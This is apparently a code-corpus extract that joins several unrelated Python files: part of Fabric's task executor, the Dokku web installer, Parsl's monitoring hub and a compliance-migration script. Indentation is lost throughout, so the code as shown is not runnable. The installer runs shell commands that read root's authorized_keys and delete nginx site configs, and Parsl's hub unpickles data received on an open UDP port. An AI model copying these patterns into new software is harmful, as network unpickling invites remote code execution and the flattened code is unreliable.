'b'])`` might return ``{'a': None, 'b': 'bar'}`` if ``foo`` returned
nothing on host `a` but returned ``'bar'`` on host `b`.
In situations where a task execution fails for a given host but overall
progress does not abort (such as when :ref:`env.skip_bad_hosts
<skip-bad-hosts>` is True) the return value for that host will be the
error object or message.
.. seealso::
:ref:`The execute usage docs <execute>`, for an expanded explanation
and some examples.
.. versionadded:: 1.3
.. versionchanged:: 1.4
Added the return value mapping; previously this function had no defined
return value.
"""
my_env = {'clean_revert': True}
results = {}
# Obtain task
if not (callable(task) or _is_task(task)):
# Assume string, set env.command to it
my_env['command'] = task
task = crawl(task, state.commands)
if task is None:
abort("%r is not callable or a valid task name" % (task,))
# Set env.command if we were given a real function or callable task obj
else:
dunder_name = getattr(task, '__name__', None)
my_env['command'] = getattr(task, 'name', dunder_name)
# Normalize to Task instance if we ended up with a regular callable
if not _is_task(task):
task = WrappedCallableTask(task)
# Filter out hosts/roles kwargs
new_kwargs, hosts, roles, exclude_hosts = parse_kwargs(kwargs)
# Set up host list
my_env['all_hosts'] = task.get_hosts(hosts, roles, exclude_hosts, state.env)
parallel = requires_parallel(task)
if parallel:
# Import multiprocessing if needed, erroring out usefully
# if it can't.
try:
import multiprocessing
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + """
At least one task needs to be run in parallel, but the
multiprocessing module cannot be imported (see above
traceback.) Please make sure the module is installed
or that the above ImportError is fixed.""")
else:
multiprocessing = None
# Get pool size for this task
pool_size = task.get_pool_size(my_env['all_hosts'], state.env.pool_size)
# Set up job queue in case parallel is needed
queue = multiprocessing.Queue() if parallel else None
role_limits = state.env.get('role_limits', None)
jobs = JobQueue(pool_size, queue, role_limits=role_limits,
debug=state.output.debug)
if state.output.debug:
jobs._debug = True
# Call on host list
if my_env['all_hosts']:
# Attempt to cycle on hosts, skipping if needed
for host in my_env['all_hosts']:
try:
results[host] = _execute(
task, host, my_env, args, new_kwargs, jobs, queue,
multiprocessing
)
except NetworkError, e:
results[host] = e
# Backwards compat test re: whether to use an exception or
# abort
if not state.env.use_exceptions_for['network']:
func = warn if state.env.skip_bad_hosts else abort
error(e.message, func=func, exception=e.wrapped)
else:
raise
# If requested, clear out connections here and not just at the end.
if state.env.eagerly_disconnect:
disconnect_all()
# If running in parallel, block until job queue is emptied
if jobs:
err = "One or more hosts failed while executing task '%s'" % (
my_env['command']
)
jobs.close()
# Abort if any children did not exit cleanly (fail-fast).
# This prevents Fabric from continuing on to any other tasks.
# Otherwise, pull in results from the child run.
ran_jobs = jobs.run()
for name, d in ran_jobs.iteritems():
if d['exit_code'] != 0:
if isinstance(d['results'], BaseException):
error(err, exception=d['results'])
else:
error(err)
results[name] = d['results']
# Or just run once for local-only
else:
with settings(**my_env):
results['<local-only>'] = task.run(*args, **new_kwargs)
    # Return what we can from the inner task executions
return results
|
dokku-installer.py
|
#!/usr/bin/env python2.7
import cgi
import json
import os
import re
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.11.4'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(line)
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, m.group(1))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
monitoring.py
|
import os
import socket
import pickle
import logging
import time
import datetime
import zmq
import queue
from multiprocessing import Process, Queue
from parsl.utils import RepresentationMixin
from parsl.monitoring.message_type import MessageType
from typing import Optional
try:
from parsl.monitoring.db_manager import dbm_starter
except Exception as e:
_db_manager_excepts = e # type: Optional[Exception]
else:
_db_manager_excepts = None
def start_file_logger(filename, name='monitoring', level=logging.DEBUG, format_string=None):
"""Add a stream log handler.
Parameters
---------
filename: string
Name of the file to write logs to. Required.
name: string
Logger name. Default="parsl.executors.interchange"
level: logging.LEVEL
Set the logging level. Default=logging.DEBUG
- format_string (string): Set the format string
format_string: string
Format string to use.
Returns
-------
None.
"""
if format_string is None:
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler(filename)
handler.setLevel(level)
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
class UDPRadio(object):
def __init__(self, monitoring_url, source_id=None, timeout=10):
"""
Parameters
----------
monitoring_url : str
URL of the form <scheme>://<IP>:<PORT>
source_id : str
String identifier of the source
timeout : int
timeout, default=10s
"""
self.monitoring_url = monitoring_url
self.sock_timeout = timeout
self.source_id = source_id
try:
self.scheme, self.ip, port = (x.strip('/') for x in monitoring_url.split(':'))
self.port = int(port)
except Exception:
raise Exception("Failed to parse monitoring url: {}".format(monitoring_url))
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
self.sock.settimeout(self.sock_timeout)
def send(self, message_type, task_id, message):
""" Sends a message to the UDP receiver
        Parameters
        ----------
        message_type: monitoring.MessageType (enum)
            In this case the message type is most often RESOURCE_INFO.
        task_id: int
            Task identifier of the task for which resource monitoring is being reported.
        message: object
            Arbitrary pickle-able object to send.
        Returns
        -------
        Number of bytes sent; False if the send timed out, None if pickling failed.
        """
x = 0
try:
buffer = pickle.dumps((self.source_id, # Identifier for manager
int(time.time()), # epoch timestamp
message_type,
message))
except Exception:
logging.exception("Exception during pickling", exc_info=True)
return
try:
x = self.sock.sendto(buffer, (self.ip, self.port))
except socket.timeout:
logging.error("Could not send message within timeout limit")
return False
return x
def __del__(self):
self.sock.close()
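# Minimal usage sketch for UDPRadio (illustrative values only, not part of the
# original module): the constructor parses a "udp://<ip>:<port>" style URL, and
# send() pickles the tuple (source_id, timestamp, message_type, message) into a
# single datagram aimed at the Hub's UDP socket.
#
#     radio = UDPRadio("udp://127.0.0.1:55055", source_id=0)
#     radio.send(MessageType.TASK_INFO, 0, {"task_id": 0, "hostname": "worker-1"})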
class MonitoringHub(RepresentationMixin):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port_range=(55000, 56000),
workflow_name=None,
workflow_version=None,
logging_endpoint='sqlite:///monitoring.db',
logdir=None,
logging_level=logging.INFO,
resource_monitoring_enabled=True,
resource_monitoring_interval=30): # in seconds
"""
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
            This is overridden when the hub_port option is set. Default: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port_range : tuple(int, int)
            The MonitoringHub picks a port at random from this range for the ZMQ channel to the client (dfk).
            Default: (55000, 56000)
workflow_name : str
            The name for the workflow. Defaults to the name of the parsl script.
        workflow_version : str
            The version of the workflow. Defaults to the beginning datetime of the parsl script.
logging_endpoint : str
The database connection url for monitoring to log the information.
These URLs follow RFC-1738, and can include username, password, hostname, database name.
Default: 'sqlite:///monitoring.db'
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
resource_monitoring_enabled : boolean
Set this field to True to enable logging the info of resource usage of each task. Default: True
resource_monitoring_interval : int
The time interval at which the monitoring records the resource usage of each task. Default: 30 seconds
"""
self.logger = None
self._dfk_channel = None
if _db_manager_excepts:
raise(_db_manager_excepts)
self.client_address = client_address
self.client_port_range = client_port_range
self.hub_address = hub_address
self.hub_port = hub_port
self.hub_port_range = hub_port_range
self.logging_endpoint = logging_endpoint
self.logdir = logdir
self.logging_level = logging_level
self.workflow_name = workflow_name
self.workflow_version = workflow_version
self.resource_monitoring_enabled = resource_monitoring_enabled
self.resource_monitoring_interval = resource_monitoring_interval
def start(self, run_id):
if self.logdir is None:
self.logdir = "."
try:
os.makedirs(self.logdir)
except FileExistsError:
pass
# Initialize the ZMQ pipe to the Parsl Client
self.logger = start_file_logger("{}/monitoring_hub.log".format(self.logdir),
name="monitoring_hub",
level=self.logging_level)
self.logger.info("Monitoring Hub initialized")
self.logger.debug("Initializing ZMQ Pipes to client")
self.monitoring_hub_active = True
self._context = zmq.Context()
self._dfk_channel = self._context.socket(zmq.DEALER)
self._dfk_channel.set_hwm(0)
self.dfk_port = self._dfk_channel.bind_to_random_port("tcp://{}".format(self.client_address),
min_port=self.client_port_range[0],
max_port=self.client_port_range[1])
comm_q = Queue(maxsize=10)
self.stop_q = Queue(maxsize=10)
self.priority_msgs = Queue()
self.resource_msgs = Queue()
self.node_msgs = Queue()
self.queue_proc = Process(target=hub_starter,
args=(comm_q, self.priority_msgs, self.node_msgs, self.resource_msgs, self.stop_q),
kwargs={"hub_address": self.hub_address,
"hub_port": self.hub_port,
"hub_port_range": self.hub_port_range,
"client_address": self.client_address,
"client_port": self.dfk_port,
"logdir": self.logdir,
"logging_level": self.logging_level,
"run_id": run_id
},
)
self.queue_proc.start()
self.dbm_proc = Process(target=dbm_starter,
args=(self.priority_msgs, self.node_msgs, self.resource_msgs,),
kwargs={"logdir": self.logdir,
"logging_level": self.logging_level,
"db_url": self.logging_endpoint,
},
)
self.dbm_proc.start()
try:
udp_dish_port, ic_port = comm_q.get(block=True, timeout=120)
except queue.Empty:
self.logger.error("Hub has not completed initialization in 120s. Aborting")
raise Exception("Hub failed to start")
self.monitoring_hub_url = "udp://{}:{}".format(self.hub_address, udp_dish_port)
return ic_port
def send(self, mtype, message):
self.logger.debug("Sending message {}, {}".format(mtype, message))
return self._dfk_channel.send_pyobj((mtype, message))
def close(self):
if self.logger:
self.logger.info("Terminating Monitoring Hub")
if self._dfk_channel and self.monitoring_hub_active:
self.monitoring_hub_active = False
self._dfk_channel.close()
self.logger.info("Waiting Hub to receive all messages and terminate")
try:
msg = self.stop_q.get()
self.logger.info("Received {} from Hub".format(msg))
except queue.Empty:
pass
self.logger.info("Terminating Hub")
self.queue_proc.terminate()
self.priority_msgs.put(("STOP", 0))
def __del__(self):
self.close()
@staticmethod
def monitor_wrapper(f, task_id, monitoring_hub_url, run_id, sleep_dur):
""" Internal
Wrap the Parsl app with a function that will call the monitor function and point it at the correct pid when the task begins.
"""
def wrapped(*args, **kwargs):
p = Process(target=monitor, args=(os.getpid(), task_id, monitoring_hub_url, run_id, sleep_dur))
p.start()
try:
return f(*args, **kwargs)
finally:
# There's a chance of zombification if the workers are killed by some signals
p.terminate()
p.join()
return wrapped
class Hub(object):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port=None,
monitoring_hub_address="127.0.0.1",
logdir=".",
run_id=None,
logging_level=logging.DEBUG,
atexit_timeout=3 # in seconds
):
""" Initializes a monitoring configuration class.
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
            This is overridden when the hub_port option is set. Default: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
        client_port : int
            The port at which the dfk will be able to reach the Hub. Default: None
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
            Logging level as defined in the logging module. Default: logging.DEBUG (10)
atexit_timeout : float, optional
The amount of time in seconds to terminate the hub without receiving any messages, after the last dfk workflow message is received.
"""
try:
os.makedirs(logdir)
except FileExistsError:
pass
self.logger = start_file_logger("{}/hub.log".format(logdir),
name="hub",
level=logging_level)
self.logger.debug("Hub starting")
if not hub_port:
self.logger.critical("At this point the hub port must be set")
self.hub_port = hub_port
self.hub_address = hub_address
self.atexit_timeout = atexit_timeout
self.run_id = run_id
self.loop_freq = 10.0 # milliseconds
# Initialize the UDP socket
self.logger.debug("Intiializing the UDP socket on 0.0.0.0:{}".format(hub_port))
try:
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
# We are trying to bind to all interfaces with 0.0.0.0
self.sock.bind(('0.0.0.0', hub_port))
self.sock.settimeout(self.loop_freq / 1000)
except OSError:
self.logger.critical("The port is already in use")
self.hub_port = -1
self._context = zmq.Context()
self.dfk_channel = self._context.socket(zmq.DEALER)
self.dfk_channel.set_hwm(0)
self.dfk_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.dfk_channel.connect("tcp://{}:{}".format(client_address, client_port))
self.ic_channel = self._context.socket(zmq.DEALER)
self.ic_channel.set_hwm(0)
self.ic_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.logger.debug("hub_address: {}. hub_port_range {}".format(hub_address, hub_port_range))
self.ic_port = self.ic_channel.bind_to_random_port("tcp://*",
min_port=hub_port_range[0],
max_port=hub_port_range[1])
def start(self, priority_msgs, node_msgs, resource_msgs, stop_q):
while True:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
try:
msg = self.dfk_channel.recv_pyobj()
self.logger.debug("Got ZMQ Message from DFK: {}".format(msg))
priority_msgs.put((msg, 0))
if msg[0].value == MessageType.WORKFLOW_INFO.value and 'python_version' not in msg[1]:
break
except zmq.Again:
pass
try:
msg = self.ic_channel.recv_pyobj()
msg[1]['run_id'] = self.run_id
msg = (msg[0], msg[1])
self.logger.debug("Got ZMQ Message from interchange: {}".format(msg))
node_msgs.put((msg, 0))
except zmq.Again:
pass
last_msg_received_time = time.time()
while time.time() - last_msg_received_time < self.atexit_timeout:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
last_msg_received_time = time.time()
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
stop_q.put("STOP")
def hub_starter(comm_q, priority_msgs, node_msgs, resource_msgs, stop_q, *args, **kwargs):
hub = Hub(*args, **kwargs)
comm_q.put((hub.hub_port, hub.ic_port))
hub.start(priority_msgs, node_msgs, resource_msgs, stop_q)
def monitor(pid, task_id, monitoring_hub_url, run_id, sleep_dur=10):
"""Internal
Monitors the Parsl task's resources by pointing psutil to the task's pid and watching it and its children.
"""
import psutil
import platform
import logging
import time
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logging.basicConfig(filename='{logbase}/monitor.{task_id}.{pid}.log'.format(
logbase="/tmp", task_id=task_id, pid=pid), level=logging.DEBUG, format=format_string)
logging.debug("start of monitor")
radio = UDPRadio(monitoring_hub_url,
source_id=task_id)
# these values are simple to log. Other information is available in special formats such as memory below.
simple = ["cpu_num", 'cpu_percent', 'create_time', 'cwd', 'exe', 'memory_percent', 'nice', 'name', 'num_threads', 'pid', 'ppid', 'status', 'username']
# values that can be summed up to see total resources used by task process and its children
summable_values = ['cpu_percent', 'memory_percent', 'num_threads']
pm = psutil.Process(pid)
pm.cpu_percent()
first_msg = True
while True:
logging.debug("start of monitoring loop")
try:
d = {"psutil_process_" + str(k): v for k, v in pm.as_dict().items() if k in simple}
d["run_id"] = run_id
d["task_id"] = task_id
d['resource_monitoring_interval'] = sleep_dur
d['hostname'] = platform.node()
d['first_msg'] = first_msg
d['timestamp'] = datetime.datetime.now()
logging.debug("getting children")
children = pm.children(recursive=True)
logging.debug("got children")
d["psutil_cpu_count"] = psutil.cpu_count()
d['psutil_process_memory_virtual'] = pm.memory_info().vms
d['psutil_process_memory_resident'] = pm.memory_info().rss
d['psutil_process_time_user'] = pm.cpu_times().user
d['psutil_process_time_system'] = pm.cpu_times().system
d['psutil_process_children_count'] = len(children)
try:
d['psutil_process_disk_write'] = pm.io_counters().write_bytes
d['psutil_process_disk_read'] = pm.io_counters().read_bytes
except Exception:
# occasionally the per-pid files that hold this information are unavailable to be read, so set to zero
logging.exception("Exception reading IO counters for main process. Recorded IO usage may be incomplete", exc_info=True)
d['psutil_process_disk_write'] = 0
d['psutil_process_disk_read'] = 0
for child in children:
for k, v in child.as_dict(attrs=summable_values).items():
d['psutil_process_' + str(k)] += v
d['psutil_process_time_user'] += child.cpu_times().user
d['psutil_process_time_system'] += child.cpu_times().system
d['psutil_process_memory_virtual'] += child.memory_info().vms
d['psutil_process_memory_resident'] += child.memory_info().rss
try:
d['psutil_process_disk_write'] += child.io_counters().write_bytes
d['psutil_process_disk_read'] += child.io_counters().read_bytes
except Exception:
# occasionally the per-pid files that hold this information are unavailable to be read, so add zero
logging.exception("Exception reading IO counters for child {k}. Recorded IO usage may be incomplete".format(k=k), exc_info=True)
d['psutil_process_disk_write'] += 0
d['psutil_process_disk_read'] += 0
logging.debug("sending message")
radio.send(MessageType.TASK_INFO, task_id, d)
first_msg = False
except Exception:
logging.exception("Exception getting the resource usage. Not sending usage to Hub", exc_info=True)
logging.debug("sleeping")
time.sleep(sleep_dur)
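# Illustrative sketch (not part of the original module): the executor side is
# assumed to launch `monitor` in a separate process alongside the task; the
# pid, task id, hub URL and run id are placeholders supplied by the caller.
def _example_launch_monitor(task_pid, task_id, monitoring_hub_url, run_id):
    from multiprocessing import Process
    p = Process(target=monitor,
                args=(task_pid, task_id, monitoring_hub_url, run_id),
                kwargs={'sleep_dur': 10})
    p.daemon = True
    p.start()
    return p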
|
cmp_migrate_thread.py
|
from compliance_standards import cmp_compare, cmp_get, cmp_add
from sdk.color_print import c_print
from tqdm import tqdm
import threading
def migrate(tenant_sessions: list, logger):
'''
Accepts a list of tenant session objects.
Gets a list of the top-level compliance standards that are missing and migrates
each missing standard along with all of its requirements and sections. Does not
search for and add missing requirements or sections on their own; that is
handled in the sync module, which does a much more time-intensive nested search
of all the compliance data across all tenants.
'''
standards_added = []
requirements_added = []
sections_added = []
#Get compliance standards from all tenants
tenant_compliance_standards_lists = []
for session in tenant_sessions:
tenant_compliance_standards_lists.append(cmp_get.get_compliance_standard_list(session, logger))
#Compare compliance standards
clone_compliance_standards_to_migrate = cmp_compare.get_compliance_stanadards_to_add(tenant_sessions, tenant_compliance_standards_lists, logger)
#Get all requirements and sections for each standard. This is a deep nested search and takes some time
clone_compliance_standards_data = []
for tenant in tqdm(clone_compliance_standards_to_migrate, desc='Getting Compliance Data', leave=False):
tenant_compliance = []
pool = []
tenant_threads = break_into_threads(tenant)
for tenant_thread in tenant_threads:
x = threading.Thread(target=get_cmp_info, args=(tenant_compliance, tenant_thread, tenant_sessions[0], logger))
pool.append(x)
x.start()
for index, thread in enumerate(pool):
thread.join()
logger.info(f'Thread: \'{index}\' done')
clone_compliance_standards_data.append(tenant_compliance)
#Migrate compliance standards. First migrate the standards and translate the UUIDs.
#Then migrate the requirements and translate the UUIDs. Finally migrate the sections.
for index, tenant_standards in enumerate(clone_compliance_standards_data):
#Migrate compliance standards
added = 0
for standard in tenant_standards:
cmp_add.add_compliance_standard(tenant_sessions[index + 1], standard['standard'], logger)
added += 1
standards_added.append(added)
#Translate compliance IDs
clone_standards = cmp_get.get_compliance_standard_list(tenant_sessions[index + 1], logger)
for i in range(len(tenant_standards)):
name = tenant_standards[i]['standard']['name']
for j in range(len(clone_standards)):
if clone_standards[j]['name'] == name:
new_id = clone_standards[j]['id']
tenant_standards[i]['standard'].update(id=new_id)
break
#Migrate compliance requirements and sections.
#The counters are shared with the worker threads through a dict guarded by a
#lock; plain integer arguments would not propagate increments back from the
#threads, so the per-tenant totals would always be reported as zero.
counts = {'requirements': 0, 'sections': 0}
counts_lock = threading.Lock()
#Break tenant_standards into threads
tenant_standards_threads = break_into_threads(tenant_standards)
pool = []
for thread in tenant_standards_threads:
x = threading.Thread(target=add_cmp_thread, args=(thread, counts, counts_lock, tenant_sessions, index, logger))
pool.append(x)
x.start()
for thread_index, thread in enumerate(pool):
thread.join()
logger.info(f'Thread: \'{thread_index}\' done')
sections_added.append(counts['sections'])
requirements_added.append(counts['requirements'])
logger.info('Finished migrating Compliance Standards')
print()
return standards_added, requirements_added, sections_added
#==============================================================================
def add_cmp_thread(tenant_standards, counts, counts_lock, tenant_sessions, index, logger):
for index2, standard in enumerate(tenant_standards):
requirements = standard['requirements']
std_id = standard['standard']['id']
for requirement in requirements:
cmp_add.add_requirement_to_standard(tenant_sessions[index + 1], std_id, requirement['requirement'], logger)
with counts_lock: counts['requirements'] += 1
#Translate compliance IDs
clone_requirements = cmp_get.get_compliance_requirement_list(tenant_sessions[index+1], standard['standard'], logger)
for i in range(len(requirements)):
name = requirements[i]['requirement']['name']
for j in range(len(clone_requirements)):
if clone_requirements[j]['name'] == name:
new_id = clone_requirements[j]['id']
requirements[i]['requirement'].update(id=new_id)
break
#Update requirements list with the list that has the new ids - maybe not needed but easy to do
tenant_standards[index2].update(requirements=requirements)
#Migrate sections now that the requirement UUIDs have been updated
for requirement in requirements:
req_id = requirement['requirement']['id']
sections = requirement['sections']
for section in sections:
cmp_add.add_section_to_requirement(tenant_sessions[index+1], req_id, section, logger)
with counts_lock: counts['sections'] += 1
#==============================================================================
def get_cmp_info(tenant_compliance, tenant, session, logger):
for standard in tenant:
standard_dict = {}
requirements = []
requirements_data = cmp_get.get_compliance_requirement_list(session, standard, logger)
for requirement in requirements_data:
requirement_dict = {}
sections = cmp_get.get_compliance_sections_list(session, requirement, logger)
requirement_dict.update(requirement=requirement)
requirement_dict.update(sections=sections)
requirements.append(requirement_dict)
standard_dict.update(standard=standard)
standard_dict.update(requirements=requirements)
tenant_compliance.append(standard_dict)
#==============================================================================
#Break list into equal sized chunks for threading
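#Example (illustrative): with max_threads = 10, a 12-item list is split into
#ten chunks and the final chunk absorbs the remainder:
#  break_into_threads(list(range(12)))
#  -> [[0], [1], [2], [3], [4], [5], [6], [7], [8], [9, 10, 11]]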
def break_into_threads(list_to_break):
max_threads = 10
thread_size = len(list_to_break) // max_threads
if thread_size < 1:
thread_size = 1
if max_threads > len(list_to_break):
max_threads = len(list_to_break)
thread_list = []
for i in range(max_threads):
start = i * thread_size
end = start + thread_size
if i + 1 == max_threads:
items_for_thread = list_to_break[start:]
else:
items_for_thread = list_to_break[start:end]
thread_list.append(items_for_thread)
return thread_list
#==============================================================================
#Test code
if __name__ == '__main__':
import logging
from sdk import load_config
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
tenant_sessions = load_config.load_config_create_sessions()
migrate(tenant_sessions, logger)
# tenant_compliance = [
# {
# 'standard': standard_dict,
# 'requirements': [
# {
# 'requirement': requirement_dict,
# 'sections': [
# section_dict
# ]
# }
# ]
# }
# ]
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
